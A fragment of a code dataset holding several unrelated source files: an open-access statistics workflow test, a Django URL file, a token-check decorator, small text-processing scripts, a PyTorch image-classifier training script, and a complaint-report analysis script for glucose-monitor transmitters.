\"n_outputs_closed\": 52,\n \"n_outputs_black\": 90,\n \"n_outputs_oa_journal\": 19,\n \"n_outputs_hybrid\": 10,\n \"n_outputs_no_guarantees\": 8,\n \"n_outputs_preprint\": 10,\n \"n_outputs_domain\": 27,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 48.0,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 11.0,\n \"p_outputs_both\": 26.0,\n \"p_outputs_other_platform_open\": 37.0,\n \"p_outputs_other_platform_open_only\": 11.0,\n \"p_outputs_closed\": 52.0,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 51.35135135135135,\n \"p_outputs_hybrid\": 27.027027027027028,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 27.027027027027028,\n \"p_outputs_domain\": 72.97297297297297,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n },\n },\n {\n \"year\": 2021,\n \"date\": \"2021-12-31\",\n \"stats\": {\n \"n_citations\": 233,\n \"n_outputs\": 100,\n \"n_outputs_open\": 45,\n \"n_outputs_publisher_open\": 37,\n \"n_outputs_publisher_open_only\": 14,\n \"n_outputs_both\": 23,\n \"n_outputs_other_platform_open\": 31,\n \"n_outputs_other_platform_open_only\": 8,\n \"n_outputs_closed\": 55,\n \"n_outputs_black\": 90,\n \"n_outputs_oa_journal\": 20,\n \"n_outputs_hybrid\": 9,\n \"n_outputs_no_guarantees\": 8,\n \"n_outputs_preprint\": 10,\n \"n_outputs_domain\": 27,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 45.0,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 14.000000000000002,\n \"p_outputs_both\": 23.0,\n \"p_outputs_other_platform_open\": 31.0,\n \"p_outputs_other_platform_open_only\": 8.0,\n \"p_outputs_closed\": 55.00000000000001,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 54.054054054054056,\n \"p_outputs_hybrid\": 24.324324324324326,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 32.25806451612903,\n \"p_outputs_domain\": 87.09677419354838,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n },\n },\n ],\n \"repositories\": repositories,\n }\n ]\n\n for e_dict, a_entity in zip(expected, entities):\n a_dict = a_entity.to_dict()\n self.assertDictEqual(e_dict, a_dict)\n\n # Institution\n entity_type = \"institution\"\n\n # Load index\n df_index = pd.DataFrame(self.institution_index)\n preprocess_index_df(entity_type, df_index)\n\n # Load data\n df_data = pd.DataFrame(self.institution_data)\n preprocess_data_df(entity_type, df_data)\n\n # Make index and entities\n df_index = make_index_df(entity_type, df_index, df_data)\n entities = make_entities(entity_type, df_index, df_data)\n\n expected = [\n {\n \"id\": \"02n415q13\",\n \"name\": \"Curtin University\",\n \"country_code\": \"AUS\",\n \"country_name\": \"Australia\",\n \"description\": {\n \"license\": Description.license,\n \"text\": None,\n \"url\": \"https://en.wikipedia.org/wiki/Curtin_University\",\n },\n \"entity_type\": entity_type,\n \"url\": \"https://curtin.edu.au/\",\n \"wikipedia_url\": \"https://en.wikipedia.org/wiki/Curtin_University\",\n \"subregion\": \"Australia and New Zealand\",\n \"region\": \"Oceania\",\n \"institution_type\": \"Education\",\n \"end_year\": 2021,\n \"start_year\": 2020,\n \"stats\": {\n \"n_citations\": 354,\n \"n_outputs\": 200,\n \"n_outputs_open\": 93,\n \"n_outputs_publisher_open\": 74,\n \"n_outputs_publisher_open_only\": 25,\n \"n_outputs_both\": 49,\n \"n_outputs_other_platform_open\": 68,\n \"n_outputs_other_platform_open_only\": 19,\n \"n_outputs_closed\": 107,\n \"n_outputs_black\": 180,\n \"n_outputs_oa_journal\": 39,\n \"n_outputs_hybrid\": 19,\n \"n_outputs_no_guarantees\": 16,\n \"n_outputs_preprint\": 20,\n \"n_outputs_domain\": 54,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 46.5,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 12.5,\n \"p_outputs_both\": 24.5,\n \"p_outputs_other_platform_open\": 34.0,\n \"p_outputs_other_platform_open_only\": 9.5,\n \"p_outputs_closed\": 53.5,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 52.702702702702695,\n \"p_outputs_hybrid\": 25.675675675675674,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 29.411764705882355,\n \"p_outputs_domain\": 79.41176470588235,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n },\n \"years\": [\n {\n \"year\": 2020,\n \"date\": \"2020-12-31\",\n \"stats\": {\n \"n_citations\": 121,\n \"n_outputs\": 100,\n \"n_outputs_open\": 48,\n \"n_outputs_publisher_open\": 37,\n \"n_outputs_publisher_open_only\": 11,\n \"n_outputs_both\": 26,\n \"n_outputs_other_platform_open\": 37,\n \"n_outputs_other_platform_open_only\": 11,\n \"n_outputs_closed\": 52,\n \"n_outputs_black\": 90,\n \"n_outputs_oa_journal\": 19,\n \"n_outputs_hybrid\": 10,\n \"n_outputs_no_guarantees\": 8,\n \"n_outputs_preprint\": 10,\n \"n_outputs_domain\": 27,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 48.0,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 11.0,\n \"p_outputs_both\": 26.0,\n \"p_outputs_other_platform_open\": 37.0,\n \"p_outputs_other_platform_open_only\": 11.0,\n \"p_outputs_closed\": 52.0,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 51.35135135135135,\n \"p_outputs_hybrid\": 27.027027027027028,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 27.027027027027028,\n \"p_outputs_domain\": 72.97297297297297,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n },\n },\n {\n \"year\": 2021,\n \"date\": \"2021-12-31\",\n \"stats\": {\n \"n_citations\": 233,\n \"n_outputs\": 100,\n \"n_outputs_open\": 45,\n \"n_outputs_publisher_open\": 37,\n \"n_outputs_publisher_open_only\": 14,\n \"n_outputs_both\": 23,\n \"n_outputs_other_platform_open\": 31,\n \"n_outputs_other_platform_open_only\": 8,\n \"n_outputs_closed\": 55,\n \"n_outputs_black\": 90,\n \"n_outputs_oa_journal\": 20,\n \"n_outputs_hybrid\": 9,\n \"n_outputs_no_guarantees\": 8,\n \"n_outputs_preprint\": 10,\n \"n_outputs_domain\": 27,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 45.0,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 14.000000000000002,\n \"p_outputs_both\": 23.0,\n \"p_outputs_other_platform_open\": 31.0,\n \"p_outputs_other_platform_open_only\": 8.0,\n \"p_outputs_closed\": 55.00000000000001,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 54.054054054054056,\n \"p_outputs_hybrid\": 24.324324324324326,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 32.25806451612903,\n \"p_outputs_domain\": 87.09677419354838,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n },\n },\n ],\n \"repositories\": repositories,\n }\n ]\n\n for e_dict, a_entity in zip(expected, entities):\n a_dict = a_entity.to_dict()\n self.assertDictEqual(e_dict, a_dict)\n\n def test_save_entities(self):\n with CliRunner().isolated_filesystem() as t:\n for entity_type, index, data, entity_ids in self.entities:\n # Read data\n df_index = pd.DataFrame(index)\n preprocess_index_df(entity_type, df_index)\n\n df_data = pd.DataFrame(data)\n preprocess_data_df(entity_type, df_data)\n\n # Save entities\n df_index = make_index_df(entity_type, df_index, df_data)\n entities = make_entities(entity_type, df_index, df_data)\n path = os.path.join(t, \"data\", entity_type)\n save_entities(path, entities)\n\n # Check that entity json files are saved\n for entity_id in entity_ids:\n file_path = os.path.join(path, f\"{entity_id}.json\")\n print(f\"Assert exists: {file_path}\")\n self.assertTrue(os.path.isfile(file_path))\n\n\ndef make_expected_build_files(base_path: str) -> List[str]:\n countries = [\"AUS\", \"NZL\"]\n institutions = [\"03b94tp07\", \"02n415q13\"] # Auckland, Curtin\n categories = [\"country\"] * len(countries) + [\"institution\"] * len(institutions)\n entity_ids = countries + institutions\n expected = []\n\n # Add base data files\n data_path = os.path.join(base_path, \"data\")\n file_names = [\"stats.json\", \"country.json\", \"institution.json\", \"index.json\"]\n for file_name in file_names:\n expected.append(os.path.join(data_path, file_name))\n\n # Add country and institution specific data files\n for entity_type, entity_id in zip(categories, entity_ids):\n path = os.path.join(data_path, entity_type, f\"{entity_id}.json\")\n expected.append(path)\n\n # Add logos\n for entity_type, entity_id in zip(categories, entity_ids):\n for size in [\"sm\", \"md\", \"lg\"]:\n if entity_type == \"country\" and size == \"lg\":\n continue\n\n file_type = \"svg\"\n if entity_type == \"institution\":\n file_type = \"jpg\"\n if size == \"lg\":\n file_type = \"png\"\n\n path = os.path.join(base_path, \"images\", \"logos\", entity_type, size, f\"{entity_id}.{file_type}\")\n expected.append(path)\n\n return expected\n","sub_path":"academic_observatory_workflows/workflows/tests/test_oa_web_workflow.py","file_name":"test_oa_web_workflow.py","file_ext":"py","file_size_in_byte":58361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"241424940","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.login_view, name='login_view'),\n path('ttt/', views.tesst, name='tesst'),\n path('register/', views.home_view, name='home_view'),\n path('/tes/', views.tes, name='tes'),\n path('/tes2/', views.tes2, name='tes2'),\n path('/register-courses/', views.to_regCourses, name='register-courses'),\n path('/registered-courses/', views.regCourses, name='registered-courses'),\n path('//register/', views.regcourseview, name='register'),\n]\n","sub_path":"Profiler/Profiler1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"149074370","text":"from access_tokens import tokens\nfrom django.http import Http404\nfrom django.conf import settings\n\n\ndef validate_token(function):\n def wrap(request, *args, **kwargs):\n token = kwargs.get('token')\n case_id = kwargs.get('case_id')\n validate = tokens.validate(\n token, scope=(), key=case_id,\n salt=settings.TOKEN_SALT, max_age=None\n )\n if validate:\n return function(request, *args, **kwargs)\n else:\n raise Http404\n return wrap\n","sub_path":"casereport/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"530244228","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 3 22:57:08 2020\n\n@author: viktor\n\"\"\"\n\nn=int(input(\"\"))\nx=1\nc=1\nprint(1)\nif n>1:\n while x text.txt\n# to get a list sorted by frequency:\n# python3 frequency.py < ru_pud-ud-test.conllu | sort -nr > text.txt\n# or it's also possible to use the for loop you advised, but I had\n# difficulty using your code as I kept warning 'list indices must be integers or slices, not tuple'\n# so I wrote the same with the format function\n\n\nfreq = []\n\nfor w in vocab:\n\tfreq.append((vocab[w], w))\n\n# freq.sort(reverse=True)\n\nfor i in freq:\n\tprint ('{}\\t{}'.format(i[0], i[1]))\n\n# now I have a unique word list arranged by frequency\n","sub_path":"2018-komp-ling/practicals/translit/frequency.py","file_name":"frequency.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"585673755","text":"import numpy as np\nimport sys\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam\nimport torch.utils.data as Data\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms as tf\nimport Model\n\n# parameters\nEPOCH = 1\nBATCH_SIZE = 256\nLEARNING_RATE = 0.001\n\ndef flipped_data(imgs, y):\n new_imgs = imgs.copy()\n new_y = y.copy()\n num_data = new_imgs.shape[0]\n for i in range(num_data):\n new_imgs[i,0,:,:] = new_imgs[i,0,:,::-1]\n return new_imgs, new_y\n\ndef parse_csv(label_path):\n raw_data_fp = open(label_path,'r')\n lines = raw_data_fp.readlines()[1:]\n num_data = len(lines)\n\n raw_imgs = np.empty(shape=(num_data,1,48*48), dtype=float)\n raw_y = np.zeros(shape=(num_data),dtype=np.int64)\n for i, line in enumerate(lines):\n nums = line.split(',')\n raw_y[i] = int(nums[0])\n raw_imgs[i,:,:] = np.array([float(num) for num in nums[1].split(' ')]) /255.0\n \n raw_imgs = raw_imgs.reshape((num_data,1,48,48))\n \n return raw_imgs, raw_y\n '''\ndef augment_data(r_imgs, r_y):\n #f_imgs, f_y = flipped_data(r_imgs, r_y)\n #imgs = np.concatenate((r_imgs, f_imgs), axis=0)\n imgs = torch.tensor(imgs).type(torch.FloatTensor)\n #y = np.concatenate((r_y, f_y), axis=0)\n y = torch.tensor(y).type(torch.LongTensor)\n transform = tf.Compose([\n tf.ToPILImage(),\n tf.ColorJitter(brightness=0.4, contrast=0.3, saturation=0.3, hue=0.3), \n tf.RandomHorizontalFlip(),\n tf.RandomRotation(30),\n tf.RandomResizedCrop(48,scale=(0.85,1)),\n tf.ToTensor()\n ])\n aug_imgs1 = imgs.clone()\n for i in range(imgs.size()[0]):\n aug_imgs1[i, :, :, :] = transform(aug_imgs1[i])\n aug_imgs2 = imgs.clone()\n for i in range(imgs.size()[0]):\n aug_imgs2[i, :, :, :] = transform(aug_imgs2[i])\n imgs = torch.cat((imgs,aug_imgs1, aug_imgs2), 0)\n y = torch.cat((y, y, y), 0)\n #imgs = torch.cat((imgs,aug_imgs1), 0)\n #y = torch.cat((y, y), 0)\n print(imgs.size(), y.size())\n return imgs, y\n '''\nclass TrainDataset(Dataset):\n def __init__(self, raw_imgs, raw_y):\n aug_imgs, aug_y = flipped_data(raw_imgs, raw_y)\n imgs = np.concatenate((raw_imgs, aug_imgs), axis=0)\n self.imgs = torch.tensor(imgs).type(torch.FloatTensor)\n y = np.concatenate((raw_y, aug_y), axis=0)\n self.y = torch.tensor(y).type(torch.LongTensor)\n self.transform = tf.Compose([\n tf.ToPILImage(),\n tf.ColorJitter(brightness=0.4, contrast=0.4, saturation=0.4),\n tf.RandomRotation(30), \n tf.RandomResizedCrop(48,scale=(0.8,1)),\n tf.ToTensor()\n ])\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, idx):\n #return self.imgs[idx], self.y[idx]\n return self.transform(self.imgs[idx]).type(torch.FloatTensor), self.y[idx]\n\nif __name__ == \"__main__\":\n raw_imgs, raw_y = parse_csv(sys.argv[1])\n imgs_shape = raw_imgs.shape\n y_shape = raw_y.shape\n c = np.concatenate((raw_imgs.reshape(len(raw_imgs), -1), raw_y.reshape(len(raw_y),1)), axis=1)\n np.random.shuffle(c)\n raw_imgs = (c[:, :-1]).reshape(imgs_shape)\n raw_y = (c[:, -1]).reshape(y_shape)\n \n num_val_data = 0#raw_imgs.shape[0] // 12\n val_imgs = raw_imgs[:num_val_data,:,:]\n val_y = raw_y[:num_val_data]\n\n train_imgs = raw_imgs[num_val_data:,:,:,:]\n train_y = raw_y[num_val_data:]\n a = train_imgs.shape[0]\n\n training_set = TrainDataset(train_imgs, train_y)\n val_set = Data.TensorDataset(\n torch.tensor(val_imgs).type(torch.FloatTensor), \n torch.tensor(val_y).type(torch.LongTensor))\n train_loader = DataLoader(\n training_set, batch_size=BATCH_SIZE, shuffle=True, num_workers=4)\n val_loader = DataLoader(val_set, batch_size=BATCH_SIZE, shuffle=False)\n \n # train\n device = torch.device('cuda')\n model = Model.MyCNN()\n try:\n model.load_state_dict(torch.load('model_params.pkl'))\n print('use exist parameters')\n except:\n print('new model, no exist parameters')\n pass\n model.to(device)\n optimizer = Adam(model.parameters(), lr=LEARNING_RATE)\n loss_func = nn.CrossEntropyLoss()\n\n print('start training...')\n model.train()\n\n high_val_acc = 0.67\n for epoch in range(EPOCH):\n train_loss, train_acc = [], []\n torch.cuda.empty_cache()\n for step, (img, target) in enumerate(train_loader):\n #print(img.size(), target.size()) \n img_cuda = img.to(device, dtype=torch.float)\n target_cuda = target.to(device)\n\n optimizer.zero_grad()\n output = model(img_cuda)\n #print(output.size(), target_cuda.size())\n loss = loss_func(output, target_cuda)\n loss.backward()\n optimizer.step()\n\n predict = torch.max(output, 1)[1]\n acc = np.mean((target_cuda == predict).cpu().numpy())\n train_acc.append(acc)\n train_loss.append(loss.item())\n acc = np.mean(train_acc)\n val_acc = 0\n if num_val_data > 0:\n model.eval()\n for _, (img, target) in enumerate(val_loader):\n img_cuda = img.to(device, dtype=torch.float)\n target_cuda = target.to(device)\n output = model(img_cuda)\n predict = torch.max(output, 1)[1]\n val_acc += np.sum((target_cuda == predict).cpu().numpy())\n val_acc /= val_set.__len__()\n if val_acc > high_val_acc:\n high_val_acc = val_acc\n torch.save(model.state_dict(), 'model_params.pkl')\n print('saved new parameters')\n model.train()\n if epoch % 10 == 0:\n torch.save(model.state_dict(), 'model_params.pkl')\n print('saved new parameters')\n print(\"Epoch: {}| Loss: {:.4f}| Acc: {:.4f}| Val Acc: {:.4f}\"\\\n .format(epoch + 1, np.mean(train_loss), acc, val_acc))\n \n model.eval()\n # save parameters\n # torch.save(model, 'model.pkl') # entire net\n torch.save(model.state_dict(), 'model_params.pkl') # parameters\n \n\n","sub_path":"hw3/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17669339","text":"import glob\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport seaborn as sns\nimport subprocess\nimport sys\nimport textwrap\nsys.path.append(os.path.expandvars(r'%UserProfile%\\Desktop\\Development\\_libs'))\nfrom AgileExportProcessor.modules.agile_export_processor import AgileExportProcessor\nfrom DexcomMappings.modules.codes import Codes\nfrom DexcomMappings.modules.products import Product\nfrom PeriodicReports.periodic_reports import PeriodicReport\nfrom collections import OrderedDict\nfrom jinja2 import Environment\nfrom jinja2 import FileSystemLoader\n\nprod = Product()\ncodes = Codes()\n\n\ndef work(pr):\n # Process exports\n aep = AgileExportProcessor(glob.glob(os.path.join(pr.working_directory, 'Periodic Reports*.csv')))\n\n # Import Shipments Data\n g5_tx_1_2_sns = pd.read_csv(os.path.join(pr.working_directory, 'shipments/serial_number-lot_number_shipment_tracking.csv'),\n low_memory=False, usecols=['Serial Number'])['Serial Number'].unique()\n\n # Get problem_reports dataframe\n problem_reports = aep.get_problem_reports().copy()\n\n # Limit to G5 Transmitter complaints only\n problem_reports = problem_reports[problem_reports.product_line.isin(prod.tags_search('G5 & Transmitter'))]\n problem_reports['product_type'] = 'G5 Transmitter'\n\n # Limit to complaints only\n problem_reports = problem_reports[problem_reports.problem_code.isin(codes.complaint_classification_codes())].copy()\n\n # Extract transmitter serial number\n problem_reports['ex_transmitter_sn'] = AgileExportProcessor.determine_transmitter_serial_number(problem_reports, complaint_deep_search=True)\n\n # Determine if 1.2 TX\n problem_reports.loc[pd.notnull(problem_reports.ex_transmitter_sn), 'is_1.2_tx'] = problem_reports.ex_transmitter_sn.isin(g5_tx_1_2_sns)\n\n # Categories\n problem_reports.loc[(problem_reports.problem_code.isin([3008,4001,5011,5012,5013,5017,5018,5018,5019,5020,5021,5023,5024,5102,5104])), 'bucket'] = problem_reports.problem_code_and_summary.str.extract('.+? (.+)', expand=False)\n problem_reports.loc[(problem_reports.problem_code == 42), 'bucket'] = \"???'s / Hourglass\"\n problem_reports.loc[(problem_reports.problem_code.isin([25, 46])), 'bucket'] = \"Adhesive Issue\"\n problem_reports.loc[(problem_reports.problem_code.isin([52, 80, 81, 82, 83, 85])), 'bucket'] = \"Audio and Vibration\"\n problem_reports.loc[(problem_reports.problem_code.isin([28, 30, 41])), 'bucket'] = \"Battery Charge Issue\"\n problem_reports.loc[(problem_reports.problem_code.isin([49, 2015])), 'bucket'] = \"Buttons Issue\"\n problem_reports.loc[(problem_reports.problem_code.isin([1, 23, 65, 66, 67, 68, 112])), 'bucket'] = \"Calibration Issues\"\n problem_reports.loc[(problem_reports.problem_code.isin([6, 7, 115, 3005, 3006, 5010, 5015, 5016])), 'bucket'] = \"Connectivity Issues\"\n problem_reports.loc[(problem_reports.problem_code.isin([10, 47])), 'bucket'] = \"Difficulty Inserting Sensor/Transmitter\"\n problem_reports.loc[(problem_reports.problem_code.isin([31, 51, 53])), 'bucket'] = \"Display Issue\"\n problem_reports.loc[(problem_reports.problem_code.isin([37, 70, 114])), 'bucket'] = \"Error Icon\"\n problem_reports.loc[(problem_reports.problem_code.isin([71])), 'bucket'] = \"Failed Sensor after Calibration\"\n problem_reports.loc[(problem_reports.problem_code.isin([13])), 'bucket'] = \"Failed Sensor before Calibration\"\n problem_reports.loc[(problem_reports.problem_code.isin([40, 50])), 'bucket'] = \"Firmware-related\"\n problem_reports.loc[(problem_reports.problem_code.isin([12])), 'bucket'] = \"Inaccuracies\"\n problem_reports.loc[(problem_reports.problem_code.isin([89])), 'bucket'] = \"Low TX Battery\"\n problem_reports.loc[(problem_reports.problem_code.isin([113, 2009])), 'bucket'] = \"Pairing Issues\"\n problem_reports.loc[(problem_reports.problem_code.isin([24,32,45,88,94,95,96,105,106,108,3001,3003,3004,5000,5001,5002,5006,5008,5009,3500,4000,5014,5100,4002])), 'bucket'] = \"Other\"\n problem_reports.loc[(problem_reports.problem_code.isin([9, 17, 36, 48, 73, 76, 77, 91, 97, 109, 110, 2010, 2011, 2013, 2014])), 'bucket'] = \"Physical Damage\"\n problem_reports.loc[(problem_reports.problem_code.isin([20, 21, 22, 75, 1502])), 'bucket'] = \"Physiological\"\n problem_reports.loc[(problem_reports.problem_code.isin([29, 111])), 'bucket'] = \"Receiver Won't Turn On/Ceases to Function\"\n problem_reports.loc[(problem_reports.problem_code.isin([90])), 'bucket'] = \"Transmitter Failed Icon\"\n\n # Generation\n problem_reports['generation'] = 'G5 Transmitter'\n\n # Generate dataframes\n def generate_dfs(start_date, end_date):\n ''' Generates three dataframes: one with full pivot, one without Low TX Battery, and one without Pairing Issues.'''\n tx_buckets = [\"Low TX Battery\", \"Pairing Issues\", \"Connectivity Issues\", \"Transmitter Failed Icon\", \"Physical Damage\"]\n\n problem_reports_pivot = problem_reports.copy()\n\n problem_reports_pivot.loc[~problem_reports_pivot.bucket.isin(tx_buckets), 'bucket'] = 'Other'\n date_of_issue_selector = (problem_reports_pivot.date_of_issue >= start_date) & (problem_reports_pivot.date_of_issue < end_date)\n \n # Get unknown counts\n all_unknown_tx_sn_count = len(problem_reports_pivot[date_of_issue_selector & pd.isnull(problem_reports.ex_transmitter_sn)])\n without_low_tx_battery_unknown_tx_sn_count = len(problem_reports_pivot[date_of_issue_selector & pd.isnull(problem_reports.ex_transmitter_sn) & (problem_reports.bucket != 'Low TX Battery')])\n without_pairing_issues_unknown_tx_sn_count = len(problem_reports_pivot[date_of_issue_selector & pd.isnull(problem_reports.ex_transmitter_sn) & (problem_reports.bucket != 'Pairing Issues')])\n \n # Generate full pivot\n problem_reports_pivot = problem_reports_pivot[date_of_issue_selector].set_index('date_of_issue').groupby(['bucket', 'is_1.2_tx']).size().unstack(level=1).fillna(0)\n problem_reports_pivot.columns.name = None\n problem_reports_pivot.columns = ['Not G5 TX 1.2 (Qty)', 'G5 TX 1.2 (Qty)']\n\n problem_reports_pivot = problem_reports_pivot.sort_values('G5 TX 1.2 (Qty)', ascending=False)\n \n fractions_df = problem_reports_pivot / problem_reports_pivot.sum(axis=0)\n fractions_df = fractions_df.rename(columns = {'G5 TX 1.2 (Qty)': 'G5 TX 1.2 (Rate)', 'Not G5 TX 1.2 (Qty)': 'Not G5 TX 1.2 (Rate)'})\n fractions_df['variance'] = fractions_df['G5 TX 1.2 (Rate)'] - fractions_df['Not G5 TX 1.2 (Rate)']\n\n all_pivot = pd.concat([problem_reports_pivot, fractions_df], axis=1)\n \n all_pivot = all_pivot.loc[tx_buckets + ['Other',]].fillna(0).astype('float')\n \n # Generate pivot without Low TX Battery\n without_low_tx_battery_pivot = all_pivot.copy()\n\n without_low_tx_battery_pivot = without_low_tx_battery_pivot.loc[without_low_tx_battery_pivot.index != 'Low TX Battery']\n\n without_low_tx_battery_pivot['Not G5 TX 1.2 (Rate)'] = without_low_tx_battery_pivot['Not G5 TX 1.2 (Qty)'] / without_low_tx_battery_pivot['Not G5 TX 1.2 (Qty)'].sum()\n without_low_tx_battery_pivot['G5 TX 1.2 (Rate)'] = without_low_tx_battery_pivot['G5 TX 1.2 (Qty)'] / without_low_tx_battery_pivot['G5 TX 1.2 (Qty)'].sum()\n without_low_tx_battery_pivot['variance'] = without_low_tx_battery_pivot['G5 TX 1.2 (Rate)'] - without_low_tx_battery_pivot['Not G5 TX 1.2 (Rate)']\n \n without_low_tx_battery_pivot = without_low_tx_battery_pivot.loc[[i for i in tx_buckets if i != 'Low TX Battery'] + ['Other',]].fillna(0).astype('float')\n \n # Generate pivot without Pairing Issues\n without_pairing_failed_pivot = all_pivot.copy()\n\n without_pairing_failed_pivot = without_pairing_failed_pivot.loc[without_pairing_failed_pivot.index != 'Pairing Issues']\n\n without_pairing_failed_pivot['Not G5 TX 1.2 (Rate)'] = without_pairing_failed_pivot['Not G5 TX 1.2 (Qty)'] / without_pairing_failed_pivot['Not G5 TX 1.2 (Qty)'].sum()\n without_pairing_failed_pivot['G5 TX 1.2 (Rate)'] = without_pairing_failed_pivot['G5 TX 1.2 (Qty)'] / without_pairing_failed_pivot['G5 TX 1.2 (Qty)'].sum()\n without_pairing_failed_pivot['variance'] = without_pairing_failed_pivot['G5 TX 1.2 (Rate)'] - without_pairing_failed_pivot['Not G5 TX 1.2 (Rate)']\n\n without_pairing_failed_pivot = without_pairing_failed_pivot.loc[[i for i in tx_buckets if i != 'Pairing Issues'] + ['Other',]].fillna(0).astype('float')\n\n return all_pivot, without_low_tx_battery_pivot, without_pairing_failed_pivot, all_unknown_tx_sn_count, without_low_tx_battery_unknown_tx_sn_count, without_pairing_issues_unknown_tx_sn_count\n\n def generate_visualizations(all_pivot, without_low_tx_battery_pivot, without_pairing_failed_pivot, date_range_prefix):\n '''Generate pie charts.'''\n plt.close('all')\n sns.set_context('paper')\n matplotlib.rc('font', **{'family': 'serif', 'weight': 'normal', 'size': 10})\n\n def generate_fig(df, category_prefix):\n fig, (ax1, ax2) = plt.subplots(figsize=(7.5, 3), nrows=1, ncols=2)\n\n ax1.set_title('Not G5 TX 1.2\\nTotal Complaints = {:,}'.format(df['Not G5 TX 1.2 (Qty)'].sum()))\n patches, labels, autopcts = ax1.pie(x = df['Not G5 TX 1.2 (Qty)'], labels = [textwrap.fill(i, 25) for i in df.index], \n colors = sns.color_palette('colorblind'), autopct = '%1.1f%%', counterclock = True, \n pctdistance = 0.86, labeldistance=1.05)\n for i in labels:\n i.set_fontsize('xx-small')\n for i in autopcts:\n i.set_fontsize('xx-small')\n ax1.axis('equal')\n\n ax2.set_title('G5 TX 1.2\\nTotal Complaints = {:,}'.format(df['G5 TX 1.2 (Qty)'].sum()))\n patches, labels, autopcts = ax2.pie(x = df['G5 TX 1.2 (Qty)'], labels = [textwrap.fill(i, 25) for i in df.index], \n colors = sns.color_palette('colorblind'), autopct = '%1.1f%%', counterclock = True, \n pctdistance = 0.86, labeldistance=1.05)\n for i in labels:\n i.set_fontsize('xx-small')\n for i in autopcts:\n i.set_fontsize('xx-small')\n ax2.axis('equal')\n\n fig.savefig(os.path.join(pr.working_directory, '{}_{}.pdf'.format(date_range_prefix, category_prefix)), dpi=150, bbox_inches='tight')\n\n generate_fig(all_pivot, 'full')\n generate_fig(without_low_tx_battery_pivot, 'without_low_tx_battery')\n generate_fig(without_pairing_failed_pivot, 'without_pairing_failed')\n\n # All Dates\n all_pivot_full, without_low_tx_battery_pivot_full, without_pairing_failed_pivot_full, all_unknown_tx_sn_count_full, without_low_tx_battery_unknown_tx_sn_count_full, without_pairing_issues_unknown_tx_sn_count_full = \\\n generate_dfs('2016-10-01', pd.to_datetime(pr.export_date.tz_localize(None)))\n generate_visualizations(all_pivot_full, without_low_tx_battery_pivot_full, without_pairing_failed_pivot_full, 'all_dates')\n\n # November 2016\n all_pivot_nov_2016, without_low_tx_battery_pivot_nov_2016, without_pairing_failed_pivot_nov_2016, all_unknown_tx_sn_count_nov_2016, \\\n without_low_tx_battery_unknown_tx_sn_count_nov_2016, without_pairing_issues_unknown_tx_sn_count_nov_2016 = \\\n generate_dfs('2016-11-01', '2016-12-01')\n generate_visualizations(all_pivot_nov_2016, without_low_tx_battery_pivot_nov_2016, without_pairing_failed_pivot_nov_2016, 'nov_2016')\n\n # December 2016\n all_pivot_dec_2016, without_low_tx_battery_pivot_dec_2016, without_pairing_failed_pivot_dec_2016, all_unknown_tx_sn_count_dec_2016, \\\n without_low_tx_battery_unknown_tx_sn_count_dec_2016, without_pairing_issues_unknown_tx_sn_count_dec_2016 = \\\n generate_dfs('2016-12-01', '2017-01-01')\n 